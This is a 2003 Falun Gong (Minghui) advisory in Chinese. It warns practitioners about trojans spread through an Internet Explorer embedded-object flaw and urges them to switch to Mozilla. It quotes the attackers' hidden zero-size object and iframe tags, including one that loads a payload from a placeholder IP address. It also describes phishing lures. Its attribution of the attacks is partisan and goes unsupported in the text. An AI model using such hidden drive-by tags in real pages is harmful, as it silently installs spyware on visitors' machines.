IE安全漏洞多　建議換用其它瀏覽器

【明慧網2003年11月11日】在邪惡最近發起的針對海外學員的電腦病毒攻擊中，主要利用的是微軟的互聯網瀏覽器 IE (Internet Explorer) 安全漏洞。在此建議放棄IE，換用其它瀏覽器，並將新瀏覽器設為「Default"(默認瀏覽器)，這樣將大大減少中毒的機會。尤其是掌握不好防火牆應該放過哪些程序的學員，更應及早更換。

本文將詳細的介紹一些這方面的情況，對IE的漏洞有個更清晰的認識。

這幾年邪惡在電腦攻擊方面的發展過程大致是：

1、從大陸直接攻擊海外大法網站，造成無法登陸。
2、在海外找跳板，再攻擊大法網站。
3、盜用大法網站的名義，去攻擊美國政府網站。
4、設立代理服務器作陷阱。
5、在學員郵件通訊之間傳播病毒，主要是一些社會上流行的病毒。
6、在跟蹤學員郵件之後，模仿學員的口氣，語言，傳播病毒。主要是用附件方式。

在大家的完全意識越來越強之後，特別是對打開郵件附件的警惕，邪惡的這些招術也就不太起作用了。

事實上，邪惡的這些「破壞性攻擊「只是圖一時之痛快，現在他們也慢慢放棄這種低能行為，而是逐漸轉向更具目的性的「收集有用信息」的方向。傳播「木馬」程序成為他們的重點。

「木馬」就是在你不知道的情況下，偷偷在你的電腦裏安裝的程序，每次開機，這個程序也自動起動，在背後運行，監視你的鍵盤操作並記錄帳號、密碼，收集你的地址簿，掃描所有文檔，偷取有用消息，目的就是要把這些東西傳回給一個遠程服務器。

種植木馬並不容易，過去通常都要用戶先運行一個程序(比如打開郵件附件)，但是，隨著微軟的 IE 安全漏洞被曝光，直接訪問一個網頁就可在你電腦裏種上木馬，這就更加隱蔽，邪惡立即瘋狂採用。

他們「木馬」的傳播方式有以下特點：

1）內容：

模擬真相郵件，包括：「大審判」，「多種形式講真相」；說一些好奇的東西，如「神五現場出現UFO」；或者是傳遞一些大陸學員XX被捕等內幕消息。總之，盡可能揣摩人的心裏，這在病毒界稱為「SOCIAL ENGINEERING」， 就是「社會工程學」，利用人的心理弱點，來引誘人閱讀其內容。

2）網頁聯接：

光是閱讀郵件內容，還不足，必須要讓你訪問一個網頁。通常會說，「請點擊這裏了解最新進展」，這就會連到一個網頁上，而這個網頁會包含「惡毒代碼」，主要是利用 IE 的「內嵌對像」(EMBEDDED OBJECT)的漏洞，如果打開頁面的源代碼 (VIEW SOURCE)，就會看到類似這樣的代碼：

＜object data="lhxyexe.asp" height=0 width=0＞＜/object＞
＜object data="lhxyhta.asp" height=0 width=0＞＜/object＞

或者被包裝起來，像這樣：
＜iframe src="mm.html" name="id" width="0" height="0" frameborder="0"＞，而mm.html才包含上面的 object 代碼。

這裏的秘密就在於，「height=0 width=0」，所以在頁面上是不可見的。

3）網頁附件：

當大家都在談論「網頁聯接」，而不要去點擊可疑 聯接 (URL) 時，邪惡又採用了一個新的形式，就是直接送一個 HTML 附件給你，通常人們對於這樣的文本附件不會起疑心。錯了！這個HTML 頁面裏，也會嵌入「惡毒代碼」，但是，它必須直接用完整的URL：
＜object data="https://xxx.xxx.xxx.xxx/lhxyexe.asp" height=0 width=0＞＜/object＞

4）存放惡毒代碼的服務器開始移到海外：

開始的時候，惡毒代碼要訪問一個國內的網站去直接下載木馬，發現有上海、山東等地的；它也利用國內的門戶網站來轉接到自己的服務器上，比如，你看上去訪問的是網易的網站 https://abckdkd.nease.net, 但網易提供了域名轉接，這個網站馬上被轉到一個另外一個邪惡控制的服務器上。

我們說要裝上防火牆，如果莫名出現訪問大陸的 IP 地址，就要小心。於是，邪惡就開始在海外申請網站空間。最近發現一個是在美國，一個是在東南亞某國。

面對這種防不勝防的局面，怎麼辦？

其實很簡單。邪惡利用的就是 IE 的漏洞。放棄IE 就是釜底抽薪，徹底沒有了它的黑手可鑽的空子。所以，大家一定要引起重視。

其它的好的瀏覽器可以用 Mozilla 或 Netscape。 Mozilla 安裝很簡單, 請訪問 www.mozilla.com。

關鍵的問題是要把 Mozilla 設置成「Default」(默認瀏覽器) ，就是你點擊一個 URL 聯結，彈出的就是Mozilla 而不是 IE。

有些多媒體網站，Mozilla 不一定支持得很好。IE 是不是就不能用呢？也不是。如果你確認網站是安全的，是沒有問題的，比如上放光明網站。

總之，放棄IE是目前最方便地抵制邪惡杜絕木馬的一個方法，希望大家充份重視起來。